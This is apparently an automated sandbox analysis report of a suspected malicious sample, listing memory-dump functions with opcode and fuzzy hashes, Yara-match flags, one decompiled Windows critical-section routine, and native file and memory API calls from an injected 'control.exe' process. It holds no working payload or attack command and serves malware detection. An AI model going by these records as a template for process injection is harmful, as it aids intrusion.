Opcode ID: f750cf9aac889168a07994857cae80047ce21ca0dffa1e8ac8bde40dcbfab341
Instruction ID: fc3258b26333eaaf29120211e0aa220e52a995e9371ab5e29cf628008965ceae
Opcode Fuzzy Hash: f750cf9aac889168a07994857cae80047ce21ca0dffa1e8ac8bde40dcbfab341
Instruction Fuzzy Hash: 5E9002A122100453D10461A944047060046A7E1341FD1C012A2144594CC9698C616665

Uniqueness

Uniqueness Score: -1.00%

Function 01299820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 780df4d49f2fa815a50c6be2b6927967b4b0b42ea20a9596a269e9b8831494a3
Instruction ID: 2f3ea8990e88f832cd9a1c1e10edd62f0671786ca89fb22e6d559e2d4e68b349
Opcode Fuzzy Hash: 780df4d49f2fa815a50c6be2b6927967b4b0b42ea20a9596a269e9b8831494a3
Instruction Fuzzy Hash: 6490027125100813D14171A94404606000AB7D0381FD1C012A0414594ECA958A56BFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0129B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a43538526734aaa23a87095a8d9d22110537bf696071c0e13a1fcb03c60532
Instruction ID: 17ccfec4904716d33ea9579917e40073b008ee17ef8bb2cad08c415fe0d39908
Opcode Fuzzy Hash: 91a43538526734aaa23a87095a8d9d22110537bf696071c0e13a1fcb03c60532
Instruction Fuzzy Hash: E59002A1611144534540B1A948044065016B7E13413D1C121A04445A0CCAA88855A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 012998A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637225809ba4aefd5ae7313d8a41fd893a952dd97cd270f9bd3870ef2f00a980
Instruction ID: dbc8a8150a36b67dbc5e1b6bc92d7dec1fde35663adcf6b0dd43e0b39a1a5842
Opcode Fuzzy Hash: 637225809ba4aefd5ae7313d8a41fd893a952dd97cd270f9bd3870ef2f00a980
Instruction Fuzzy Hash: BF90026131100813D10261A94414606000AE7D1385FD1C012E1414595DCA658953B672

Uniqueness

Uniqueness Score: -1.00%

Function 01299B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ac6078208e156cffd74cba05a3ada83d6089df540fa1c799c1b796ead1b647
Instruction ID: 3cdc990d4ea40acfbbd8b800f7890ec8429c90d4f7f88e3c353b441bec718936
Opcode Fuzzy Hash: 89ac6078208e156cffd74cba05a3ada83d6089df540fa1c799c1b796ead1b647
Instruction Fuzzy Hash: EF90026125100C13D14071A984147070007E7D0741FD1C011A0014594DCA5689657BF1

Uniqueness

Uniqueness Score: -1.00%

Function 0129A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ffa308b1a7f1563c2e7680012cf3e4ec750b2b118489500a47e99ed8895236e
Instruction ID: 0f2fa197549ab8067a9a9fc37bc0f1e7cf384e9e84b5fd67548d46f94c38fc33
Opcode Fuzzy Hash: 6ffa308b1a7f1563c2e7680012cf3e4ec750b2b118489500a47e99ed8895236e
Instruction Fuzzy Hash: F490027121144413D14071A9844460B5006B7E0341FD1C411E0415594CCA558856A761

Uniqueness

Uniqueness Score: -1.00%

Function 01299A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7a9e06e32078a170db8955b4f5744456390f7dd3bc397245ff7fbedafbea89
Instruction ID: 0b4357a0db0ef521d03ec7843a437812fe63859849a530a9a7b9fe56a162635f
Opcode Fuzzy Hash: 2f7a9e06e32078a170db8955b4f5744456390f7dd3bc397245ff7fbedafbea89
Instruction Fuzzy Hash: D790027121140813D10061A948087470006A7D0342FD1C011A5154595ECAA5C8917A71

Uniqueness

Uniqueness Score: -1.00%

Function 01299A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8508d76cad27ef992d0c52a7f6ba6f5b4843d2e0f66194f19df52d50bb3c7a3
Instruction ID: 924af91f3880462305caeb4c2457e94cf06024df49f5243611a5f704573b13e4
Opcode Fuzzy Hash: e8508d76cad27ef992d0c52a7f6ba6f5b4843d2e0f66194f19df52d50bb3c7a3
Instruction Fuzzy Hash: 2990026121144853D14062A94804B0F4106A7E1342FD1C019A4146594CCD5588556B61

Uniqueness

Uniqueness Score: -1.00%

Function 01299520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f91b2249e1cef46fb41aa356ba8da622c12bc7134e47aad0cbfd8de5472909f9
Instruction ID: 6aadbda68935cb96a4c842f915dc49fb8a97c5d1a55e6f752d8cd4b02573bf6c
Opcode Fuzzy Hash: f91b2249e1cef46fb41aa356ba8da622c12bc7134e47aad0cbfd8de5472909f9
Instruction Fuzzy Hash: 519002E1211144A34500A2A98404B0A4506A7E0341BD1C016E10445A0CC9658851A675

Uniqueness

Uniqueness Score: -1.00%

Function 0129AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0988c07aa637c0549b42b8d11f347f9d080c9727698457024eb1ee03781069ac
Instruction ID: 9290ae781be12c06df633c2011e65c29bb6bb467140473581977fff7cb270ae1
Opcode Fuzzy Hash: 0988c07aa637c0549b42b8d11f347f9d080c9727698457024eb1ee03781069ac
Instruction Fuzzy Hash: 7B900271A1500423914071A948146464007B7E0781BD5C011A0504594CCD948A5567E1

Uniqueness

Uniqueness Score: -1.00%

Function 01299560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7670e823d0134a415a0e2f3b15612ab7f2c36d8437ad9d5bf9fe4a662dbbc2ea
Instruction ID: 4e674bc929876336466d7054bb1864e24690cda6a8637200972799f1e4fea00c
Opcode Fuzzy Hash: 7670e823d0134a415a0e2f3b15612ab7f2c36d8437ad9d5bf9fe4a662dbbc2ea
Instruction Fuzzy Hash: EC900265231004130145A5A9060450B0446B7D63913D1C015F14065D0CCA6188656761

Uniqueness

Uniqueness Score: -1.00%

Function 012995F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f4d86b17168750a83180b502c5612c50065615476b32bc7879123ca85729d28
Instruction ID: d4f12f93bfa792ca6f162178329a2255439e5526c85b0c8e9c57dcf361872669
Opcode Fuzzy Hash: 5f4d86b17168750a83180b502c5612c50065615476b32bc7879123ca85729d28
Instruction Fuzzy Hash: 8690027121100C13D10461A948046860006A7D0341FD1C011A6014695EDAA588917671

Uniqueness

Uniqueness Score: -1.00%

Function 01299730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583b0d08d6566acc176814e781d79cc906da1090ac9133d1dfff52a5944a7cc1
Instruction ID: 0c41d0257558d4bd4703542d4c0440af748a61ceb3ecce60df9f835a012d4619
Opcode Fuzzy Hash: 583b0d08d6566acc176814e781d79cc906da1090ac9133d1dfff52a5944a7cc1
Instruction Fuzzy Hash: E590026161500813D14071A954187060016A7D0341FD1D011A0014594DCA998A557BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0129A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6558a25761ed8e765f6440d52489aca301efea6ad02d9a1c55dcbccc70e7fab7
Instruction ID: 35554226f7793d36073c15dddfaf6d0694deb5150691de8e836939b173e6409b
Opcode Fuzzy Hash: 6558a25761ed8e765f6440d52489aca301efea6ad02d9a1c55dcbccc70e7fab7
Instruction Fuzzy Hash: DA900271311004639500A6E95804A4A4106A7F0341BD1D015A4004594CC99488616661

Uniqueness

Uniqueness Score: -1.00%

Function 01299760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a25736e9659ab75d1d4e06d4b3bc25e41016d48f2dad8b8fb61f1a4a954f50d
Instruction ID: 93266f4ec211810b5e252935031811a3dacdc184bac41fe4ba039635cbd7d6fe
Opcode Fuzzy Hash: 5a25736e9659ab75d1d4e06d4b3bc25e41016d48f2dad8b8fb61f1a4a954f50d
Instruction Fuzzy Hash: 3190027121100813D10061A955087070006A7D0341FD1D411A0414598DDA9688517661

Uniqueness

Uniqueness Score: -1.00%

Function 0129A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37deb16cf779a1f35b892d123927813923a0e4fbf36c25510440fcf3e038ce2d
Instruction ID: 69060d2eb9c40d649dccca237586b9857c0989c7ca109ba554e2ed81d8fbb4eb
Opcode Fuzzy Hash: 37deb16cf779a1f35b892d123927813923a0e4fbf36c25510440fcf3e038ce2d
Instruction Fuzzy Hash: 7490027521504853D50065A95804A870006A7D0345FD1D411A04145DCDCA948861B661

Uniqueness

Uniqueness Score: -1.00%

Function 01299770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79fe90b0cd0cb40e949ae1e83e1251ad8c13857baf2f5c27f77778554e03e552
Instruction ID: ad0111217caf341b5125a8d2afba72ba7a1852b5ad9af4a58775efa85df95ea6
Opcode Fuzzy Hash: 79fe90b0cd0cb40e949ae1e83e1251ad8c13857baf2f5c27f77778554e03e552
Instruction Fuzzy Hash: D090026121504853D10065A95408A060006A7D0345FD1D011A10545D5DCA758851B671

Uniqueness

Uniqueness Score: -1.00%

Function 01299FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43273e358a313a49bbffe4b341c0f5ae92c8f11095370bf537aa77f075ae093
Instruction ID: 15878120e03221862ff86bef730acbaec46d818029cbe33d70d0139c4860c2de
Opcode Fuzzy Hash: b43273e358a313a49bbffe4b341c0f5ae92c8f11095370bf537aa77f075ae093
Instruction Fuzzy Hash: 0990027132114813D11061A984047060006A7D1341FD1C411A0814598DCAD588917662

Uniqueness

Uniqueness Score: -1.00%

Function 01299610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed88e45c50203e2e92f3c8dde5b105341f9acd6a09a3e4fa37c81119539e8ccf
Instruction ID: cb6fe78d2c7f18cefe116dc6aed69a041efc08c97a57e2f50a7e5d30522bb505
Opcode Fuzzy Hash: ed88e45c50203e2e92f3c8dde5b105341f9acd6a09a3e4fa37c81119539e8ccf
Instruction Fuzzy Hash: 4490027161500C13D15071A944147460006A7D0341FD1C011A0014694DCB958A557BE1

Uniqueness

Uniqueness Score: -1.00%

Function 01299650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab228a3e2ed2b70e2b55b42544e96352fea8134f363c8ca6692b99662fa9a31
Instruction ID: b4416b718775dd1c4325af3f7d09b5998746ade536ec6e74a0e5d86131530f8f
Opcode Fuzzy Hash: 7ab228a3e2ed2b70e2b55b42544e96352fea8134f363c8ca6692b99662fa9a31
Instruction Fuzzy Hash: 2D90027121504C53D14071A94404A460016A7D0345FD1C011A00546D4DDA658D55BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012996D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7711cb779ac26b06601dd45fbf3bf1ae715f3af788430ba03b7afa946a4e78c
Instruction ID: e64d9cb63c56b4b53a0a5db776ef1ef8e1c51474d485b6395caec2a6778ec14d
Opcode Fuzzy Hash: d7711cb779ac26b06601dd45fbf3bf1ae715f3af788430ba03b7afa946a4e78c
Instruction Fuzzy Hash: 0390027121100C53D10061A94404B460006A7E0341FD1C016A0114694DCA55C8517A61

Uniqueness

Uniqueness Score: -1.00%

Function 01299670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 68ce89f221b2fac189577711ccd1cf62073dfa9b0a3d88730f26e5b18b919285
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 012EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E012EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0129CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E012E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E012E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x012efdda
0x012efde2
0x012efde5
0x012efdec
0x012efdfa
0x012efdff
0x012efe0a
0x012efe0f
0x012efe17
0x012efe1e
0x012efe19
0x012efe19
0x012efe19
0x012efe20
0x012efe21
0x012efe22
0x012efe25
0x012efe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012EFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012EFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012EFE2B

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: d0d31b48a2e3bb67c95b053a6dc48881b994f7532127e1d2c866077f65a0b17c
Instruction ID: 55d58f1e00c92a3f1a4b6f25ade789a6ff7f257c64b4bc8cdc47c3cace62a696
Opcode Fuzzy Hash: d0d31b48a2e3bb67c95b053a6dc48881b994f7532127e1d2c866077f65a0b17c
Instruction Fuzzy Hash: E1F0FC76160101BFE7241A46DC06F337F9ADB44730F540314F618561D1D962F83087F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exe PID: 7072 Parent PID: 3632 control.exeCOMMON

Executed Functions

Function 02E29D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02E24B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E24B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E29DAD

Strings

.z`, xrefs: 02E29D9D, 02E29DA8

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: f845113cf69838b31ba8fae0fe9808f41bb7fb16eef9c2fdc5717f678102930d
Instruction ID: cf8c757467ae08f9eb1b0e59a5086e548d791cde590ea99ffa351eeadef9d670
Opcode Fuzzy Hash: f845113cf69838b31ba8fae0fe9808f41bb7fb16eef9c2fdc5717f678102930d
Instruction Fuzzy Hash: 6C01E4B2240108ABCB08CF98DC80EEB37ADAF8C704F158248BA0DA7241C630E8018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E29D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02E24B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E24B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E29DAD

Strings

.z`, xrefs: 02E29D9D, 02E29DA8

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 39e4764177508e2724a9577979624c3dc280b2e1edc6c1e1e948a591bddcdda8
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 5CF0B6B2200108ABCB08CF89DC84DEB77ADAF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E29E0A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02E24D42,5EB6522D,FFFFFFFF,02E24A01,?,?,02E24D42,?,02E24A01,FFFFFFFF,5EB6522D,02E24D42,?,00000000), ref: 02E29E55

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c94d98a58dee74529553b1da3953306c29fbf6cf8b49a3d08a45935fdaad65d3
Instruction ID: c1e77bab8ed76d8ab2d4e47869b7f157350eb4a7e4090a311b225e73bace2087
Opcode Fuzzy Hash: c94d98a58dee74529553b1da3953306c29fbf6cf8b49a3d08a45935fdaad65d3
Instruction Fuzzy Hash: 72F0F9B2200109AFDB04DF89DC91EEB77A9EF8C754F158249FA1DA7641D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E29E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02E24D42,5EB6522D,FFFFFFFF,02E24A01,?,?,02E24D42,?,02E24A01,FFFFFFFF,5EB6522D,02E24D42,?,00000000), ref: 02E29E55

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 89dc6364e97fe0210909f53f502b4bfd55f377ba0926fe30eaa0e1ebb27616b6
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F0F0B7B2200208AFCB14DF89DC80EEB77ADEF8C754F158258BE1DA7241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E29F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02E12D11,00002000,00003000,00000004), ref: 02E29F79

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: f151afd2618aa654d3f6e553312db233729e7b2a254594808779998d9aefad8b
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: A1F015B2200218ABCB14DF89DC80EAB77ADEF88750F118158BE09A7241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E29E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02E24D20,?,?,02E24D20,00000000,FFFFFFFF), ref: 02E29EB5

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 2beae897ea066a3ca75300b5eb82a17285bd55b9b509ba2579c338b11c8c9a7b
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 0CD012752402146BD710EB99DC85E97775DEF44B50F158455BA596B241C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04DD95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD95DA

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e0331d07f8f1a33f9e4075ee2320948725b45f3b8c78f7c68e5258e7335da30
Instruction ID: f2df7cfc2b3d9add55baa1533a5f3583615d930c08e94f61a768f9b111b9d765
Opcode Fuzzy Hash: 8e0331d07f8f1a33f9e4075ee2320948725b45f3b8c78f7c68e5258e7335da30
Instruction Fuzzy Hash: 499002A1202001076105715B441463A401B97E4285B51C021E50055A0DC965D8D17165

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD954A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1535fb91b9944253fc13fa99d846c544dca96779be77d7ae512c5a35b09df397
Instruction ID: bdd74f36ae412dab0dd2a2cf3db590cb99d08dc3ee76c197d53aded6ed636acf
Opcode Fuzzy Hash: 1535fb91b9944253fc13fa99d846c544dca96779be77d7ae512c5a35b09df397
Instruction Fuzzy Hash: 18900265211001072105B55B070452B005797D93D5351C021F5006560CDA61D8A16161

Uniqueness

Uniqueness Score: -1.00%

Function 04DD96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD96DA

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3f31f6444b5ddbfaf07258da347938d7c66b30f7e3522bfe34ecfee8cb6499e
Instruction ID: 1810a1faf94bc8a72700e1fd3de09e5946428513e3199c6003f6781744c8ee20
Opcode Fuzzy Hash: e3f31f6444b5ddbfaf07258da347938d7c66b30f7e3522bfe34ecfee8cb6499e
Instruction Fuzzy Hash: 9290027120100946F100715B4404B6A001697E4385F51C016A4115664D8A55D8917561

Uniqueness

Uniqueness Score: -1.00%

Function 04DD96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD96EA

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae6f87119a7b5559b89ceee65e27c5d85c090a35776f448f33a2159e10c523e3
Instruction ID: 55eff0768840e1c6da49b7eedb0d76185564e2f9ca01fd8857dbbd3686d4ef2f
Opcode Fuzzy Hash: ae6f87119a7b5559b89ceee65e27c5d85c090a35776f448f33a2159e10c523e3
Instruction Fuzzy Hash: 1790027120108906F110715B840476E001697D4385F55C411A8415668D8AD5D8D17161

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD965A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01693f63f77e83bae42b30e0fca1ee8a480671543294da3d5aa594c5fc445ca3
Instruction ID: 2509586ec691a15a1ca485ca6011ee2186cf65abbcdae94d28a86c0b396e2a37
Opcode Fuzzy Hash: 01693f63f77e83bae42b30e0fca1ee8a480671543294da3d5aa594c5fc445ca3
Instruction Fuzzy Hash: 6090027120504946F140715B4404A6A002697D4389F51C011A40556A4D9A65DD95B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD966A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a1ad5813b93ecb3c9cbaffc9ef0eeab899b803dc2817b6b544db993fd2e1fe4
Instruction ID: 14f7c13f5cd5f96ab82de717e2c70e9f345c83e27519b85d1761edb77f9a85d7
Opcode Fuzzy Hash: 8a1ad5813b93ecb3c9cbaffc9ef0eeab899b803dc2817b6b544db993fd2e1fe4
Instruction Fuzzy Hash: 9E90027120100906F180715B440466E001697D5385F91C015A4016664DCE55DA9977E1

Uniqueness

